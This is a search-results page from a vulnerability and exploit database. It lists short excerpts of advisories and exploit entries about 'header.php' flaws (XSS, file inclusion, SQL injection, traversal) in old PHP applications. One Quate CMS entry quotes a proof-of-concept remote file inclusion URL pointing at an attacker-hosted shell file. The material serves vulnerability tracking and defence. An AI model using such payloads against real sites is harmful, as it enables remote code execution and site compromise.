CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

317 matches found

OpenVAS•added 2014/03/19 12:0 a.m.•23 views

Debian: Security Advisory (DSA-2882-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

2.6CVSS6.6AI score0.01894EPSS

Exploits3References3

OSV•added 2013/12/05 6:55 p.m.•1 views

CVE-2013-6395

Cross-site scripting XSS vulnerability in header.php in Ganglia Web 3.5.8 and 3.5.10 allows remote attackers to inject arbitrary web script or HTML via the hostregex parameter to the default URI, which is processed by getcontext.php...

5.5AI score

Exploits0References11

0day.today•added 2013/01/11 12:0 a.m.•18 views

Wordpress dynamic-headers plugin Full Path Disclosure vulnerability

Exploit for php platform in category web applications 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 +...

7.1AI score

Exploits0

Prion•added 2011/11/01 10:55 p.m.•12 views

Remote file inclusion

PHP remote file inclusion vulnerability in modchatting/themes/default/header.php in Family Connections Who is Chatting 2.2.3 allows remote attackers to execute arbitrary PHP code via a URL in the TMPLpath parameter...

7.5CVSS8AI score0.02412EPSS

Exploits1References4Affected Software1

Prion•added 2011/02/23 1:0 a.m.•12 views

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in include/html/header.php in TaskFreak! 0.6.4 allow remote attackers to inject arbitrary web script or HTML via the 1 sContext, 2 sort, 3 dir, and 4 show parameters in a save action to index.php; the 5 dir and 6 show parameters to printlist.php;...

4.3CVSS6.1AI score0.01751EPSS

Exploits2References6Affected Software1

Prion•added 2011/02/07 9:0 p.m.•17 views

Directory traversal

Multiple directory traversal vulnerabilities in AR Web Content Manager AWCM 2.2 allow remote attackers to read arbitrary files and possibly have other unspecified impact via a .. dot dot in the 1 awcmtheme or 2 awcmlang cookie to a index.php or b header.php...

6.8CVSS7.6AI score0.0194EPSS

Exploits2References3Affected Software1

Prion•added 2010/12/29 10:33 p.m.•11 views

Information disclosure

Habari 0.6.5 allows remote attackers to obtain sensitive information via a direct request to 1 header.php and 2 commentsitems.php in system/admin/, which reveals the installation path in an error message...

5CVSS6.6AI score0.02492EPSS

Exploits1References3Affected Software1

securityvulns•added 2010/05/28 12:0 a.m.•54 views

clearsite Remote File Include Vulnerability

clearsite Remote File Include Vulnerability Script: http://sourceforge.net/projects/clearsite/ name: D0ryAn location: libya website: http://www.7b-ly.com email: [email protected] bug: Remote File Include Vulnerability you can find the bug in alot of files in the script for ex deviceadmin.php...

1.1AI score

Exploits0

securityvulns•added 2010/01/28 12:0 a.m.•70 views

[InterN0T] ShareTronix 1.0.4 - HTML Injection Vulnerability

ShareTronix - HTML Injection Vulnerability Version Affected: 1.0.4 newest Info: Sharetronix Opensource is a multimedia microblogging platform. It helps people in a community, company, or group to exchange short messages over the Web. Credits: MaXe from InterN0T patched the vulnerability & Reelix...

7.3AI score

Exploits0

Packet Storm•added 2010/01/11 12:0 a.m.•32 views

ProfitCode Shopping Cart Local File Inclusion / Remote File Inclusion

Exploit Title: ProfitCode Shopping Cart Multi Vulnerability LFI/RFI Date: 2010-01-09 Author: Zer0 Thunder Site : http://www.profitcode.net/ - http://profbiz-cart.sourceforge.net/ Software Link: http://sourceforge.net/project/platformdownload.php?groupid=258424 Tested on: Windows XP sp2 WampServer...

7.4AI score

Exploits0

0day.today•added 2010/01/09 12:0 a.m.•16 views

ProfitCode Shopping Cart Multiple LFI/RFI Vulnerabilities

Exploit for unknown platform in category web applications ========================================================= ProfitCode Shopping Cart Multiple LFI/RFI Vulnerabilities ========================================================= Author: Zer0 Thunder Site : http://www.profitcode.net/ -...

7.1AI score

Exploits0

seebug.org•added 2009/12/28 12:0 a.m.•22 views

phpwind 1.3.6 header.php 权限提升漏洞

No description provided by source...

7.1AI score

Exploits0

Exploit DB•added 2009/12/01 12:0 a.m.•42 views

Quate CMS 0.3.5 - Local/Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Quate CMS PoC : http://target/path/admin/includes/header.php?securepagepath=http://attacker/shell.txt??? Vuln LFI : ./QuateCMS035/admin/includes/footer.php line 4 PoC :...

7.4AI score

Exploits0

Prion•added 2009/11/29 1:7 p.m.•21 views

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in Cacti 0.8.7e allow remote attackers to inject arbitrary web script or HTML via vectors related to 1 graph.php, 2 include/topgraphheader.php, 3 lib/htmlform.php, and 4 lib/timespansettings.php, as demonstrated by the a graphend or b graphstart...

4.3CVSS5.7AI score0.05739EPSS

Exploits6References24Affected Software1

Packet Storm•added 2009/09/21 12:0 a.m.•18 views

DDL CMS 1.0 Remote File Inclusion

+============================================================+ | | | DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities | | | +============================================================+ | | | Author : HxH | | | | E-Mail : HxHatlivedotat | | |...

0.2AI score

Exploits0

seebug.org•added 2009/09/21 12:0 a.m.•19 views

ClearSite 4.50 (cs_base_path) Remote File Inclusion Vulnerability

No description provided by source. Network Management/Inventory System header.php Remote File Include Vulnerability ----------------------------------------------------------------------------------...

7.1AI score

Exploits0

0day.today•added 2009/09/18 12:0 a.m.•23 views

ClearSite 4.50 (cs_base_path) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================= ClearSite 4.50 csbasepath Remote File Inclusion Vulnerability ================================================================= Network Management/Inventory System header.ph...

7.1AI score

Exploits0

Prion•added 2009/08/20 5:30 p.m.•13 views

Sql injection

Multiple SQL injection vulnerabilities in header.php in Scripteen Free Image Hosting Script 2.3 allow remote attackers to execute arbitrary SQL commands via a 1 cookid or 2 cookgid cookie...

7.5CVSS9.1AI score0.01083EPSS

Exploits1References5Affected Software1

Exploit DB•added 2009/07/24 12:0 a.m.•35 views

Scripteen Free Image Hosting Script 2.3 - SQL Injection

=================== Scripteen Free Image Hosting Script v2.3 SQL Injection vulnerable =================== The vulnerable: header.php line 53-62 $userid=$SESSION'userid'; $usergid=$SESSION'usergid'; if !$userid || empty$userid || $userid=="" $userid = $COOKIE'cookid'; if !$usergid || empty$usergid...

7.4AI score

Exploits0

Exploit DB•added 2009/07/10 12:0 a.m.•39 views

phpbms 0.96 - Multiple Vulnerabilities

phpBMS v0.96 phpbms.org eLwauxc2009, uasc.org.ua http://phpbms.org/trial/ SQL Inj ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $querystatement="SELECT...

7.4AI score

Exploits0

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by